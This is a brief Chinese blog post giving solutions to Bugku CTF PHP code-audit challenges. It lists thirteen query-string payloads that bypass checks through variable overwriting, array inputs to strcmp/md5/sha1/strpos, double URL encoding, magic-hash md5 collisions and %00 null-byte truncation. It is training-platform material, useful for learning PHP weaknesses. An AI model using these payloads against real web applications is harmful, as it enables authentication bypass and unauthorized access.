2019-03-31


Bugku-代码审计

https://ctf.bugku.com/challenges

1、extract变量覆盖

?flag=&shiyan=

2、strcmp比较字符串

?a[]=1

3、urldecode二次编码绕过

?id=%2568%2561%2563%256B%2565%2572%2544%254A

4、md5()函数

?username[]=1&password[]=2

5、数组返回NULL绕过

?password[]=1

?password=aA0%00--

6、弱类型整数大小比较绕过

?password[]=1

7、sha()函数比较绕过

?name[]=1&password[]=2

8、md5加密相等绕过

?a=s878926199a

9、十六进制与数字比较

?password=0xdeadc0de

10、变量覆盖

?a=&b=

11、ereg正则%00截断

?password[]=1

?password=1e9%00*-*

12、strpos数组绕过

?ctf[]=1

?ctf=1%00%23biubiubiu

13、数字验证正则绕过

42.00e+00000000000

14、简单的waf

打不开。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容